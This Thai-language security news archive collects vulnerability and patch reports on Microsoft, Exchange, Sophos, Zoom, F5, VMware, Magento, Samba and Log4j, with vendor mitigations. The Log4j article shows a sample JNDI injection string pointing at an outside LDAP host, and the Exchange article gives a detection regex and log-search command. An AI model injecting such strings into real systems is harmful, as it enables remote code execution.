คลังเก็บป้ายกำกับ: REMOTE_CODE_EXECUTION

แพตช์เดือนพฤศจิกายน 2565 จาก Microsoft อุดช่องโหว่ 68 รายการ มี 6 รายการถูกใช้โจมตีจริงแล้ว

สำหรับแพตช์ทุกสัปดาห์ที่สองของเดือนประจำเดือนพฤศจิกายน 2565 มีการแก้ไขช่องโหว่ 68 รายการ ที่น่าสนใจคือช่องโหว่ 6 รายการมีการนำไปใช้งานจริงแล้ว

Credit: alexmillos/ShutterStock

สำหรับช่องโหว่ 6 รายการที่เรียกได้ว่าเป็น Zero-day คือ

1.) CVE-2022-41128 – ช่องโหว่ RCE ใน Windows Scripting โดยผู้ใช้งาน Windows ในเวอร์ชันที่มีช่องโหว่อาจตกเป็นเหยื่อคนร้าย หากเข้าไปยังเซิร์ฟเวอร์อันตรายที่คนร้ายสร้างไว้

2.) CVE-2022-41097 -ช่องโหว่สำหรับ Bypass ฟีเจอร์ด้านความมั่นคงปลอดภัยของเว็บ โดยผู้โจมตีสามารถหลบเลี่ยงการป้องกันของ Mark of the Web(MOTW) ด้วยไฟล์ที่สร้างขึ้นมาพิเศษ ซึ่ง Will Dorman ผู้ค้นพบได้สาธิตการใช้ไฟล์ Zip อันตรายขึ้นมาด้วย ติดตามได้ที่ https://twitter.com/wdormann/status/1544416883419619333 

3.) CVE-2022-41073 – ช่องโหว่ยกระดับสิทธิ์สู่ SYSTEM เกิดขึ้นใน Windows Print Spooler

4.) CVE-2022-41125 – ช่องโหว่ยกระดับสิทธิ์สู่ SYSTEM เกิดขึ้นใน Windows CNG Key Isolation Service

5.) CVE-2022-41040 – ช่องโหว่ยกระดับสิทธิ์ของ Exchange Server ทำให้คนร้ายสามารถรัน PowerShell ได้ในสิทธิ์ระดับระบบ

6.) CVE-2022-41082 – ช่องโหว่ RCE ของ Exchange Server 

สำหรับช่องโหว่ร้ายแรงทั้งหมดในครั้งนี้มี 11 รายการ ท่านใดต้องการดูลิสต์ช่องโหว่ทั้งหมดสามารถเข้าชมได้ที่นี่

ที่มา : https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2022-patch-tuesday-fixes-6-exploited-zero-days-68-flaws/

from:https://www.techtalkthai.com/nov-2022-microsoft-patches-68-vulnerabilities/

พบช่องโหว่ Zero-Day ใหม่บน Microsoft Exchange มีรายงานการโจมตีแล้ว

พบช่องโหว่ Zero-Day แบบ Remote Code Execution ใหม่บน Microsoft Exchange มีรายงานการโจมตีแล้ว

Credit: ShutterStock.com

ผู้เชี่ยวชาญทางด้านความมั่นคงปลอดภัยจาก GTSC ประเทศเวียดนาม รายงานช่องโหว่ Zero-Day ใหม่บน Microsoft Exchange ที่เริ่มตรวจพบการโจมตีแล้ว มีการรายงานไปยัง Zero Day Initiative (ZDI) ประกอบด้วยช่องโหว่ 2 ตัวได้แก่ ZDI-CAN-18333 มีคะแนน CVSS 8.8 และ ZDI-CAN-18802 มีคะแนน CVSS 6.3 ช่องโหว่นี้สามารถสร้างความเสียหายได้ค่อนข้างมาก ทำให้ผู้โจมตีสามารถทำ Remote Code Execution (RCE) ไปยังเครื่องเป้าหมายได้ โดยใช้การโจมตีด้วย Request ที่มีลักษณะคล้ายกับการโจมตีช่องโหว่ ProxyShell ก่อนหน้านี้ และเมื่อเจาะผ่านช่องโหว่ได้สำเร็จ จะมีการติดตั้ง Antsword ซึ่งเป็น Webshell จากประเทศจีนเพื่อใช้เป็น Backdoor ในการโจมตีต่อไป

ล่าสุด Trend Micro ได้ออกรายงานเตือนเกี่ยวกับช่องโหว่นี้มาแล้วเช่นกัน มีการเพิ่ม Protection และ Detection Rule ในผลิตภัณฑ์ของตนเองแล้ว ปัจจุบันช่องโหว่นี้ยังไม่มีแพตช์จากทาง Microsoft โดยทาง GTSC แนะนำให้ผู้ดูแลระบบแก้ไขปัญหาชั่วคราวไปก่อนด้วยการปรับแต่ง IIS Server rule ผ่านทาง URL Rewrite Rule Module ดังนี้

  1. In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking.
  2. Add string “.*autodiscover\.json.*\@.*Powershell.*“ to the URL Path.
  3. Condition input: Choose {REQUEST_URI}

ผู้ดูแลระบบที่ต้องการตรวจสอบว่า Exchange Server ถูกโจมตีหรือไม่ สามารถรันคำสั่ง PowerShell ด้านล่างเพื่อตรวจสอบ IIS Log

Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover\.json.*\@.*200

สามารถอ่านรายละเอียดเกี่ยวกับช่องโหว่เพิ่มเติมได้ที่ https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html

ที่มา: https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-day-actively-exploited-in-attacks/

from:https://www.techtalkthai.com/new-zero-day-was-found-on-microsoft-exchange/

Sophos ออกแพตช์อุดช่องโหว่ Zero-Day บน Firewall

Sophos ออกแพตช์อุดช่องโหว่ Zero-Day บน Firewall ผู้ดูแลระบบควรทำการอัปเดต

Credit:alexmillos/ShutterStock

ช่วงสัปดาห์ที่ผ่านมา มีรายงานการโจมตีอุปกรณ์ Sophos Firewall ด้วยช่องโหว่ Zero-day โดยมีรหัส CVE-2022-3236 มีคะแนน CVSS score ถึง 9.8 เป็นช่องโหว่ชนิด Remote Code Execution ทำให้ผู้ไม่หวังดีสามารถเจาะเข้าถึงระบบเครือข่ายภายในได้ผ่านทางหน้า User Portal และ Webadmin ซึ่งช่องโหว่นี้มีอยู่ใน Sophos Firewall เวอร์ชัน 19.0 MR1 (19.0.1) หรือเก่ากว่า

ล่าสุด Sophos ได้ออกแพตช์อุดช่องโหว่ดังกล่าวแล้ว ผู้ดูแลระบบจึงควรทำการอัปเดตทันที โดยสามารถอัปเดตเป็นเวอร์ชันดังนี้

  • v19.5 GA
  • v19.0 MR2 (19.0.2)
  • v19.0 GA, MR1, and MR1-1
  • v18.5 MR5 (18.5.5)
  • v18.5 GA, MR1, MR1-1, MR2, MR3, and MR4
  • v18.0 MR3, MR4, MR5, and MR6
  • v17.5 MR12, MR13, MR14, MR15, MR16, and MR17
  • v17.0 MR10

ที่มา: https://thehackernews.com/2022/09/hackers-actively-exploiting-new-sophos.html

from:https://www.techtalkthai.com/sophos-releases-patch-for-zero-day-vulnerability-on-firewall/

Zoom ออกแพตช์เวอร์ชัน 5.10.0 แก้ไขช่องโหว่ XMPP

โดยทีมนักวิจัยของ Google Project Zero ได้ตรจพบช่องโหว่หลายรูปแบบที่ XML อยู่ใน Zoom Client และ Server เมื่อเดือนกุมภาพันธ์ และในวันที่ 24 เมษายน Zoom ก็ได้ออกแพตช์มาแก้ไขบนเวอร์ชัน 5.10.0

Credit: gst/ShutterStock
ช่องโหว่ CVE-2022-22786 ที่อนุญาตให้ดาวน์เกรดไคลเอ็นต์ส่งผลกระทบต่อผู้ใช้ Windows เท่านั้น ในขณะที่ปัญหาอื่นๆ อีกสามช่องโหว่ ได้แก่ CVE-2022-22784, CVE-2022-22785 และ CVE-2022-22787 ส่งผลกระทบต่อ Android, iOS, Linux, macOS และ Windows
 
XMPP เป็นโปรโตคอลที่ใช้ในการติดต่อสื่อสารข้อมูลแบบ Client-Server โดยจะมีรูปแบบการทำงานในลักษณะการส่งข้อความด่วน รองรับการรับส่งข้อความเป็นภาษา XML
 
Zoom ได้ออกแพตช์อัพเดตในเวอร์ชัน 5.10.0 เพื่อแก้ไขช่องโหว่ที่พบโดยทีม Google Project Zero โดยทันทีที่ทราบ โดยในเวอร์ชันเก่าตั้งแต่ปี 2019 นั้น จะเปิดทางให้มีการส่งข้อความที่ออกแบบเป็นพิเศษที่สามารถเรียก Client ให้เชื่อมต่อกับ Server ที่เป็นศูนย์กลางสำหรับให้บริการ Zoom Client
 

from:https://www.techtalkthai.com/zoom-patches-xmpp-to-remote-code-execution/

พบช่องโหว่ร้ายแรงบน F5 Big-ip หน่วยงาน CISA ประกาศเตือนรีบอัปเดต

F5 BIG-IP ถือเป็นอุปกรณ์ระดับองค์กรอยู่แล้ว ดังนั้นช่องโหว่ร้ายแรงประเภทลอบรันโค้ด (RCE) ถือเป็นสิ่งที่ควรจะถูกปิดอย่างไวที่สุด

ช่องโหว่อันตรายนี้มีหมายเลข CVE-2022-1388 ซึ่งเกิดขึ้นที่ iControl REST ทำให้คนร้ายสามารถ Bypass การพิสูจน์ตัวตนได้ อย่างที่กล่าวไปแล้วว่าอุปกรณ์ F5 BIG-IP มักอยู่ในระบบขององค์กรใหญ่ๆทั่วโลก ทำให้ CISA ต้องออกเตือนเร่งด่วนถึงช่องโหว่นี้แล้ว

สำหรับช่องโหว่ส่งผลกระทบกับ BIG-IP เวอร์ชันต่างๆดังตารางด้านล่างนี้ โดยผู้ใช้งานเวอร์ชัน 11.x และ 12.x จะไม่ได้รับการแก้ไข หากท่านใดที่ไม่สามารถอัปเดตได้ทันทีมีวิธีบรรเทาปัญหาได้ 3 ช่องทางคือ

1.) บล็อกการเข้าถึงอินเทอร์เฟส iControl REST บน BIG-IP ผ่านทาง Self IP แต่วิธีการนี้อาจกระทบกับการทำ HA 

2.) จำกัดการเข้าถึงจากผู้ใช้หรืออุปกรณ์ที่เชื่อน่าเชื่อถือ 

3.) แก้ไขคอนฟิคใน httpd 

credit : Bleepingcomputer

วาระเดียวกันนี้ F5 ยังได้เผยถึงช่องโหว่ร้ายแรงอื่นๆกว่า 17 รายการในเว็บไซต์ของตนตรวจสอบได้ที่ https://support.f5.com/csp/article/K55879220

ที่มา : https://www.bleepingcomputer.com/news/security/f5-warns-of-critical-big-ip-rce-bug-allowing-device-takeover/

from:https://www.techtalkthai.com/f5-big-ip-cve-2022-1388/

พบกลุ่มแฮกเกอร์อิหร่าน ใช้ช่องโหว่ VMware ในการโจมตี

พบกลุ่มแฮกเกอร์อิหร่าน ใช้ช่องโหว่ RCE ของ VMware ที่พบก่อนหน้านี้ เป็นช่องทางในการโจมตี

Credit: Nomad Soul/ShutterStock

ผู้เชี่ยวชาญทางด้านความมั่นคงปลอดภัย ได้ตรวจพบการโจมตีจากกลุ่มแฮกเกอร์อิหร่าน ที่มุ่งเป้าใช้ช่องโหว่ Remote Code Excecution (RCE) บนผลิตภัณฑ์จาก VMware เป็นช่องทางในการโจมตี โดยช่องโหว่นี้มีรหัส CVE-2022-22954 เกิดขึ้นบนผลิตภัณฑ์ VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation และ vRealize Suite Lifecycle Manager ถูกรายงานเมื่อวันที่ 6 เมษายนที่ผ่านมา เป็นช่องโหว่ที่ทำให้ผู้ไม่หวังดีสามารถยกระดับสิทธิของตนเองได้ มีความรุนแรง CVSSv3 Score ที่ระดับ 9.8 หลังจากที่ช่องโหว่นี้ถูกเปิดเผย ได้มีการโจมตีเกิดขึ้นอย่างต่อเนื่อง เมื่อผู้ไม่หวังดีสามารถเข้ายึดระบบได้แล้ว จะทำการติดตั้ง Cryptocurrency Miner ลงไปยังเครื่องที่ถูกเจาะ

อย่างไรก็ตาม ระบบที่มีช่องโหว่เหล่านี้อยู่ มีความเสี่ยงเป็นอย่างมากที่จะถูกโจมตีผ่าน Ransomware ผู้ที่ใช้งานผลิตภัณฑ์ VMware ที่มีช่องโหว่ดังกล่าวจึงควรรีบทำการอัพเดต Patch ทันที

ที่มา: https://www.darkreading.com/attacks-breaches/-iranian-group-among-those-exploiting-recently-disclosed-rce-flaw-in-vmware

from:https://www.techtalkthai.com/iranian-hacker-group-attacking-on-vmware-rce-flaw/

Microsoft แพตช์แก้ไขช่องโหว่เดือนมีนาคม จำนวน 71 รายการ

สำหรับเดือนมีนาคม 2565 นี้ มีการแก้ไขช่องโหว่ของ Microsoft ออกมาที่ 71 รายการ โดยมี Zero-days 3 รายการ

Credit: alexmillos/ShutterStock

ช่องโหว่ที่น่าสนใจมีดังนี้

1.) กลุ่มช่องโหว่ Zero-days

  • CVE-2022-21990 – ช่องโหว่ RCE บน Remote Desktop Client
  • CVE-2022-24459 – ช่องโหว่ยกระดับสิทธิ์ใน Windows Fax and Scan Service
  • CVE-2022-24512 – ช่องโหว่ RCE ใน .NET และ Visual Studio

ที่น่าจับตาคือช่องโหว่ CVE-2022-21990 และ CVE-2022-24459 พบการแจกโค้ดสาธิตแล้ว

2.) ช่องโหว่ที่อาจถูกใช้โจมตีจริง

  • CVE-2022-24508 – ช่องโหว่ RCE ใน Windows SMBv3 Client/Server
  • CVE-2022-23277 – ช่องโหว่ RCE ใน Microsoft Exchange Server

ท่านใดสนใจดูลิสต์ช่องโหว่ทั้งหมด 71 รายการ สามารถเข้าชมได้ที่ https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/March-2022.html

ที่มา : https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2022-patch-tuesday-fixes-71-flaws-3-zero-days/

from:https://www.techtalkthai.com/microsoft-patch-tuesday-mar-2022-fixes-71-vulnerabilities/

Adobe ออกแพตช์เร่งด่วนให้ Commerce และ Magento

Adobe ได้เร่งออกแพตช์ฉุกเฉินให้แก่ผลิตภัณฑ์ Commerce และ Magento ซึ่งพบการโจมตีจริงแล้ว

CVE-2022-24086 มีความรุนแรงระดับ 9.8/10 โดยเป็นช่องโหว่ที่คนร้ายในระดับสิทธิ์ที่ไม่ใช่แอดมิน สามารถเข้ามาลอบรันโค้ดได้ เนื่องจากมีบั๊กที่ไม่ได้ตรวจสอบอินพุตน์ให้ดีพอ ซึ่ง Adobe รับทราบข้อมูลมาระยะหนึ่งแล้ว รวมถึงพบการนำไปใช้โจมตีแล้วในวงจำกัด ด้วยเหตุนี้เองจึงเป็นที่มาของแพตช์เร่งด่วน

สำหรับผลกระทบเกิดขึ้นกับผู้ใช้งาน Adobe Commerce (2.3.3-p1 ถึง 2.3.7-p2) หรือ Magento Open Source(2.4.0-2.4.3-p1) เท่านั้น ชมรายละเอียดแพตช์จาก Vendor ได้ที่ https://support.magento.com/hc/en-us/articles/4426353041293-Security-updates-available-for-Adobe-Commerce-APSB22-12-

ที่มา : https://www.zdnet.com/article/patch-now-adobe-releases-emergency-fix-for-exploited-commerce-magento-zero-day/ และ https://www.bleepingcomputer.com/news/security/emergency-magento-update-fixes-zero-day-bug-exploited-in-attacks/

from:https://www.techtalkthai.com/adobe-emergency-releases-fix-for-cve-2022-24086/

พบช่องโหว่ร้ายแรงใน Samba แนะผู้ดูแลควรอัปเดต

พบช่องโหว่ร้ายแรงในซอฟต์แวร์ Samba ที่สามารถนำไปสู่การลอบรันโค้ดได้ จึงเตือนให้ผู้ใช้งานเร่งอัปเดตครับ

Credit: ShutterStock.com

Samba เป็นซอฟต์แวร์โอเพ่นซอร์สสำหรับโปรโตคอล SMB โดยทำให้สามารถแชร์ไฟล์และการพิมพ์เอกสารเกิดขึ้นได้ระหว่างเครื่อง Windows หรือ Linux ประเด็นคือที่งานแข่งขันแฮ็กเกอร์เมื่อปลายปีก่อน มีผู้เชี่ยวชาญจาก STAR Labs ใช้ช่องโหว่นี้ โดย CVE-2021-44142 เป็นปัญหา Out-bound Heap Read/Write ในโมดูล vfs-fruit ซึ่งสามารถทำให้คนร้ายอาจทำการลอบรันโค้ดได้แม้ไม่ได้ผ่านการพิสูจน์ตัวตน

Samba เวอร์ชันก่อน 4.13.17 ได้รับผลกระทบซึ่งสามารถแพตช์แก้ไขได้ที่ Samba 4.14.12 และ 4.15.5 สำหรับการ Workaroud ด้วยการลบโมดูลปัญหาออกจากการตั้งค่า VFS Object ในไฟล์ smb.conf ทำได้แต่อาจก่อปัญหาเรื่องการไม่สามารถเข้าถึงข้อมูลตามมา

ที่มา : https://www.helpnetsecurity.com/2022/02/02/samba-bug-may-allow-code-execution-as-root-on-linux-machines-nas-devices-cve-2021-44142/ และ https://www.securityweek.com/samba-patches-critical-flaws-earned-researchers-big-rewards

from:https://www.techtalkthai.com/samba-rce-patched-cve-2021-44142/

ผู้เชี่ยวชาญเตือนแพตช์ด่วนช่องโหว่ร้ายแรงใน Log4j หลังมีการใช้โจมตีจริงอย่างกว้างขวาง

ถือเป็นอีกหนึ่งช่องโหว่ระดับร้ายแรงที่มีผลกระทบอย่างกว้างขวางไม่น้อยกว่า Heartbleed หรือ ShellShock เมื่อหลายปีก่อน สำหรับช่องโหว่ CVE-2021-44228 บนแพ็กเกจสำหรับทำเรื่องเก็บ Log ที่นิยมใช้กันในภาษา JAVA ที่สามารถใช้ทำ Remote Code Execution ได้

รู้จักกับ Log4j

อย่างที่กล่าวไปแล้วว่า Log4j คือแพ็กเก็จด้านการทำ Logging ภาษา Java โดยต้นตอของปัญหาเริ่มต้นจากการที่เวอร์ชัน 2.0-beta9 (LOG4J2-313) มีการเพิ่มเข้ามาของ ‘JNDILookup Plugin’ ซึ่ง JNDI ย่อมาจาก Java Naming and Directory Interface ทั้งนี้ JNDI มีการใช้งานมาตั้งแต่ปี 1990 แล้ว ที่เป็น Directory Service ให้โปรแกรม Java สามารถค้นหาข้อมูลผ่านทางระบบ Directory ได้ (อ่านเรื่องของ Directory Service ได้ที่ https://en.wikipedia.org/wiki/Directory_service) นอกจากนี้ JNDI ยังมีการเปิด SPI (Service Provider Interface มองว่าเป็น API ก็ได้) ให้ทำงานกับ Directory Service อื่นได้เช่น CORBA COS, LDAP, RMI (remote method interface) และ DNS เป็นต้น

ตัวอย่าง URL ของการใช้งาน JNDI กับ LDAP เช่น ‘ldap://localhost:389/o=JNDITutorial’ หมายถึงการไปมองหา Object ที่ชื่อ ‘JNDITutorial’ จากเซิร์ฟเวอร์ LDAP ที่รันอยู่บนเครื่องและเปิดพอร์ต 389 แต่เช่นกันผู้ใช้งานสามารถรัน LDAP เซิร์ฟเวอร์ที่อยู่บนเครื่องอื่นหรือพอร์ตอื่นก็ได้ นี่คือจุดหนึ่งที่คนร้ายสามารถใช้ประโยชน์จากความสามารถตรงนี้ได้ 
ไม่เพียงเท่านั้น Log4j ยังมีความสามารถที่ทำให้การใช้คำสั่งนั้นซับซ้อนได้อีก ในความสามารถของ Special Syntax มีรูปแบบคือ ${prefix:name} ตัวอย่างเช่น ${java:version} ซึ่งใน 2.0-beta9 ได้มีการเพิ่มความสามารถให้ JndiLookup พร้อมกับการใช้ “:” ที่หมายถึงการไม่นับ Prefix กล่าวคือเปิดโอกาสให้สามารถประดิษฐ์คำสั่งที่ซับซ้อนได้มากขึ้นอีก

เช่น ${jndi:ldap://example.com/a} โดยการ Lookup สามารถมองหาข้อมูลได้จากทั้งส่วนคอนฟิคและ Log ที่ถูกบันทึก ด้วยเหตุนี้เองหากเพียงแฮ็กเกอร์ทราบว่ามีค่าอะไรที่น่าจะถูกเก็บ Log เอาไว้เช่น User-Agent หรือพารามิเตอร์เช่น Username ก็สามารถประดิษฐ์การโจมตีขึ้นมาได้นั่นเอง

รูปแบบของการโจมตี

Apache Log4j ถูกใช้กันในผู้พัฒนาเว็ปและเซิร์ฟเวอร์ที่ใช้ภาษา Java หรือเป็นส่วนหนึ่งของระบบการทำงานใหญ่ โดยในบล็อกของ Sophos ชี้ว่าตนพบการโจมตีเพื่อจุดประสงค์ทางการลอบรันโค้ด ค้นหา Log เพื่อสแกนทดสอบหาเหยื่อหรือติดตั้งตัวขุดเหมือง แม้กระทั่งการใช้เพื่อขโมยข้อมูล AWS Key หรือข้อมูลส่วนตัวอื่นๆ ภาพประกอบของการโจมตีเป็นไปตามด้านล่าง 

credit : Sophos

นอกจากนี้ยังมีเครื่องมือ Interactsh ที่ช่วยให้ผู้โจมตีสามารถประดิษฐ์ Request ในรูปแบบต่างๆได้อย่างมีประสิทธิภาพ ตามภาพประกอบด้านล่าง

credit : Sophos

ในมุมของ Cloudflare เองได้เผยถึงการโจมตีที่ไม่ได้จำกัดเฉพาะกับแอปพลิเคชันที่เข้าถึงได้จากอินเทอร์เน็ต แต่มีผลกับส่วนประกอบย่อยภายในที่มีการใช้ Log4j ซึ่งอาจมีการประมวลผลคำสั่งมาจากระบบหน้าด่านอื่น(ตามภาพประกอบ) และด้วยความเกี่ยวข้องอันซับซ้อนนี้ รวมถึงความยอดนิยมของ Log4j เองจึงกล่าวได้ว่าช่องโหว่นี้มองข้ามไม่ได้และต้องมีการวิเคราะห์องค์กรหรือการทำงานหลายส่วน

Credit : Cloudflare

วิธีการป้องกันสำหรับผู้ใช้งาน Log4j 2.0 เวอร์ชันbeta9 – 2.14.1

1.) แพตช์ด้วย Log4j 2.15.0

2.) ตั้งค่า Property เป็น log4j2.formatMsgNoLookups=true รวมถึง Environment variable เป็น LOG4J_FORMAT_MSG_NO_LOOKUPS=true

3.) ลบ Class ของ JndiLookup ด้วยคำสั่ง zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

อย่างไรก็ดี Vendor ต่างๆที่เกี่ยวข้องกับช่องโหว่ได้รับทราบและตื่นตัวแล้ว พร้อมทั้งประกาศเพิ่มความสามารถให้ผลิตภัณฑ์รู้จักกับรูปแบบของคำสั่งโจมตีแล้ว อย่างไรก็ดีถ้าทำได้กรุณาแพตช์ให้เร็วที่สุดครับด้วยความหวังดี

ที่มา : https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ และ https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/ และ https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/

from:https://www.techtalkthai.com/warning-cve-2021-44228-of-apache-log4j-logging-package/